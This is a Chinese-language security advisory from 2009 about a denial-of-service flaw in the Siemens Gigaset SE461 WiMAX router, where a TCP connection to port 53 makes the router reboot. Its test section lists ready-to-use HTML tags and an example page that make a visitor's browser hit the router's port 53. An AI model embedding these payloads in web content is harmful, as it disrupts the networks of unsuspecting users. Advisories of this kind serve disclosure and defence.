发布日期：2009-03-23
更新日期：2009-03-25

受影响系统：

Siemens Gigaset SE461 WiMAX router 1.5-BL024.9.6401

描述：

---

BUGTRAQ  ID: 34220

Gigaset SE461是西门子的一款高速无线路由器。

Gigaset SE461路由器的WEB管理接口没有正确地验证用户所提交的请求，用户在受影响设备的53端口上创建TCP连接后关闭连接就会导致路由器重启。攻击者可以通过直接连接到设备或使用特制的Web内容来触发这个漏洞。

<*来源：Benkei
  
  链接：http://www.milw0rm.com/exploits/8260
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<+Tags which can get used+>
<img src="http://192.168.1.1:53" />
<img src="http://192.168.1.1:53/p.png" />
<a href="http://192.168.1.1:53">click me</a>
<link href="192.168.1.1:53" rel="stylesheet" type="text/css" />
<link href="192.168.1.1:53/p.css" rel="stylesheet" type="text/css" />
<div style="background-image:url(http://192.168.1.1:53)"></div>
<div style="background-image:url(http://192.168.1.1:53/p.png)"</div>
<object data="http://192.168.1.1:53" type="image/gif" ></object>
<object data="http://192.168.1.1:53/p.gif" type="image/gif" ></object>
<script src="http://192.168.1.1:53"></script>
<script src="http://192.168.1.1:53/p.js"></script>
<iframe src="http://192.168.1.1:53"></iframe>
<iframe src="http://192.168.1.1:53/p.html"></iframe>
<bgsound src="http://192.168.1.1:53"></bgsound>
<bgsound src="http://192.168.1.1:53/p.wav"></bgsound>
<head><base href="http://192.168.1.1:53/"></head>
<base href="http://192.168.1.1:53/" /></head>
<img src="p.jpg" />
<-End->

# example html file
# "p" is a fictional file to ensure that the browser requests something

<html>
    <head>
        <base href="https://192.168.2.1:53/" />
    </head>
    <body>
        <img src="p.jpg" />
        <img src="https://192.168.2.1:53/p.jpg" />
    </body>
</html>

建议：

---

厂商补丁：

Siemens
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://gigaset.com/shc/0,1935,hq_en_0_122770_rArNrNrNrN,00.html

浏览次数：2911
严重程度：0（网友投票）